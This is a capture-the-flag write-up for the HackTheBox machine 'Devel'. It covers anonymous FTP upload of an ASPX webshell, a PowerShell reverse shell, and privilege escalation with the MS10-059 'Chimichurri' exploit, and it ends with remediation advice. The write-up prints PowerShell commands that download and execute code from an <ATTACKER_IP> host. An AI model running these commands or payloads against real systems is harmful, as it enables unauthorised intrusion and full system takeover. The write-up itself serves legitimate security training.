HackTheBox : Devel

7 min readMar 11, 2024

Summary

Devel while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Reconnaissance

Nmap

We found 2 open ports : ftp(tcp/21) and http(tcp/80).

The output shows that FTP allows anonymous access which means we can connect to it without providing any credentials.

FTP

Let’s connect to the server, then take a look at its content :

The files stored in the server seem to be the same as the IIS web root folder’s files.

This can easily be checked by trying to access for example the welcome.png image file :

As you can see, it works.

Therefore, to get an initial access to the target system, we can try to upload a reverse shell payload on the server, then launch our listener and execute the payload on the server. After that, we must normally get the reverse shell.

However, before generating the reverse shell, we need to do a couple of things :

1/ Check if we have write permissions on the FTP server.

2/ Find which backend programming language is used by the server.

To check if we have write permissions on the FTP server, we can try to upload a file on the server using the put command as follows :

Checking write permissions on the FTP server

As displayed on the image above, we have successfully uploaded our file on the FTP server.

Let’s now find out what backend programming language is used by the web server. To do that, we can use a command called whatweb which allows us to find the technologies used by a web server :

Here, the server is using ASP.NET as backend language.

With these two conditions met, we can now generation a ASPX payload.

For that you can use msfvenom. However, I decided to use the cmdasp.aspx webshell :

Uploading an apsx webshell in the web root

Accessing the web shell using the browser

Now, we need to find a way to get a shell. To do that, I am going to use Nishang. It is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Furthermore, it can be used during all phases of penetration testing.

Let’s clone the repository, then update the Invoke-PowerShellTcp script :

The Invoke-PowerShellTcp script helps us to get an interactive powershell reverse shell.

Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER_IP> -PORT <ATTACKER_PORT>

Once done, we need to save the file then run a python web server.

Nevertheless, before downloading and executing the reverse shell on the target system, we first need to setup a netcat listener to receive the reverse shell :

After that, we need to enter the following powershell command in the command input :

powershell iex(new-object net.webclient).downloadstring('http://<ATTACKER_IP>:8000/Invoke-PowerShellTcp.ps1')

Overall, this will reate a webclient object, and use the download string method to get the text that is returned from the given url. That text is then passed into iex, which runs it.

Now, let’s see if we can retrieve the user flag.

As you can see, we can’t access the user babis directory. Therefore, we need to find a way to escalate our privileges.

Privilege Escalation

In this section, we are going to use a tool called Windows Exploit Suggester. Simply put, this tool compares a target patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

For the tool to work properly, we need to specify the ‘systeminfo’ command output from a Windows host. This output will then be compared to the Microsoft security bulletin database and determine the patch level of the host.

Once executed, we’ll copy the output, then paste it in the following file :

Copying the output of the systeminfo command in sysinfo.txt

We will also need to update the database before using the tool. For that, we will use the --update flag. This will automatically download the security bulletin database from Microsoft and saves it as an Excel spreadsheet.

Once done, we can then run the tool as follows :

The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.

Refer to this page if you got the following error : ‘please install and upgrade the python-xlrd library’.

Awesome ! We got a list of possible exploits that could lead to privilege escalation.

I firstly tried the ms11–011 but it did not work. Then, I tried the ms10–59 exploit which worked fine.

After clicking on the first link, I got this :

Let’s download the executable, then transfer it to the target system and execute it.

Here is how to proceed :

After that, we need to send the executable to the target system. For that, I used the following command :

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<ATTACKER_IP>:8000/Chimichurri.exe', 'c:/windows/temp/Chimichurri.exe')"

Downloading the exploit on the target machine

Finally, let’s execute the exploit. However before executing the exploit, we should understand how it works. For that, we can take a look here :

Based on the image above, we first need to setup a netcat listener, then executes the exploit by specifying the attacker (kali) ip address and the port on which our netcat is listening

Executing the exploit on the target machine (devel)

Fantastic, we have been able to elevate our privileges.

Now, it’s time to retrieve the flags \0/

Last but not least, here are some recommendations that must help the client to better their security posture.

Recommendations

To gain system privilege on the system, we exploited two vulnerabilities, namely :

1/ FTP server misconfiguration (anonymous access)

Here, we firstly got access to an anonymous FTP server. Then we noticed that the FTP server shared the root of the web server. Once we figured this out, we uploaded a web shell on the FTP server, then leveraged that to obtain an initial access to the target system.

To avoid this vulnerability, the client should have disabled anonymous access to the FTP server. If for any particular reason the client still wanted to use an anonymous FTP server, he should have made sure that the server does not store any sensitive data and should have restricted write permissions.

2/ Windows Kernel vulnerability (lack of patch)

After gaining access to the target system, we enumerated the system information and searched for vulnerabilities that could help us escalate our privileges based on the information returned. This is how we have been able to find an exploit “Chimichurri” to get system level access.

To avoid such a vulnerability, the client should make sure to always update his system whenever a security update is available.

Wrapping Up

That’s it guys. Congrats on having made it so far 👏.

I hope you enjoyed the writeup.

If so, do not forget to click on the little clap icon below and subscribe to my newsletter to keep up with my latest articles.

References

https://github.com/samratashok/nishang
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/SecWiki/windows-kernel-exploits/
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-059

Contact

GitHub : https://github.com/0liverFlow